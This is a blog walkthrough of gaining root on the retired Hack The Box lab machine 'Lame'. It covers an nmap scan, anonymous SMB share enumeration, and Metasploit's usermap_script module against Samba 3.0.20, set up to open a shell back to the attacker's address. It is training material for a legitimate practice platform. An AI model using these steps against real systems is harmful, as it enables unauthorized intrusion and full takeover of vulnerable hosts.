In this blog post, I will show the steps that I took to get root access to the Lame machine on Hack The Box (HTB).
Lame is a retired machine. This means that it is not available on HTB free servers anymore. In order to follow along, you need a VIP subscription. The monthly fee at the moment is 12 Euro.
I assume that you have already downloaded the connection pack from https://www.hackthebox.eu/home/htb/access and you are using Kali Linux version 2020.3 as the attacking machine.
Create a Connection to the HTB Network
Refer to this post of mine.
Scanning and Enumeration
Open https://www.hackthebox.eu/home/machines and write down Lame’s IPv4 address. Next to the machine name, we see Tux the penguin and thus know right away that this is a Linux machine.
The first step for this hack is to scan the Lame machine in order to identify its open ports. We run
nmap -A -T4 -p- 10.10.10.3
The result shows us that there are five open ports and four services running behind them:
- FTP (21): File Transfer Protocol.
nmapshows that anonymous FTP login is allowed. This would be a finding if this were a penetration test. Anonymous FTP login should not be allowed in general. Using this information, we could connect to the machine via FTP and list the files in the FTP directory. Alternatively, we could check if vsFTPd version 2.3.4 is exploitable.
- SSH (22): Secure Shell. We could try a brute force attack on SSH. If this were a penetration test, this would show us how good the password policy is and whether the blue team is able to detect us.
- DISTCC (3632): I had to Google what DISTCC is. According to this post, this service “is designed to speed up compilation by taking advantage of unused processing power on other computers”. Here we could check whether DISTCC v1 is exploitable.
- SMB (139/445): This is the service that we targeted in our attack on the Windows machine called Legacy.
nmapshows that Lame is running Samba 3.0.20-Debian. This is the service that we will target today.
Firstly, we run
smbclient -L \\\\10.10.10.3\\
The result in the screenshot tells us that can list the share names without having a password, because anonymous login is allowed on SMB. This is a juicy finding. If we were able to get into
ADMIN$, we would have very good chances of exploiting this machine. Run
Unfortunately, access to this folder is denied (same result for
opt$, whereas we can get access to
IPS$ but we cannot neither
cd). The remaining folder is
tmp. Here we do not get access to
vmware-root, and files
vgauthsvclog.txt.0 do not contain interesting information. PS: I downloaded these files on my machine with
smbget -R smb://10.10.10.3/tmp, as cat didn’t work on SMB.
Now open your browser, go to Google and search samba 3.0.20-debian exploit. We open the Rapid7 page called usermap_script. This page explains that using the non-default “username map script” configuration option, we can specify a username containing shell meta characters and then execute arbitrary commands. Moreover, no authentication is needed. This is what we were looking for.
Exploit Lame and Catch the Flags
use exploit/multi/samba/usermap_script ,
set rhosts 10.10.10.3 and
set lhost <your tun0 IPv4 address>. Enter
run and cross your fingers!
We are in! We are the root user on the machine Lame. Now you just have to find the two flags for users
makis. I leave this task as a challenge for you.
I hope you liked this post. If you have any question, feel free to leave a comment in the comment section. Never stop learning!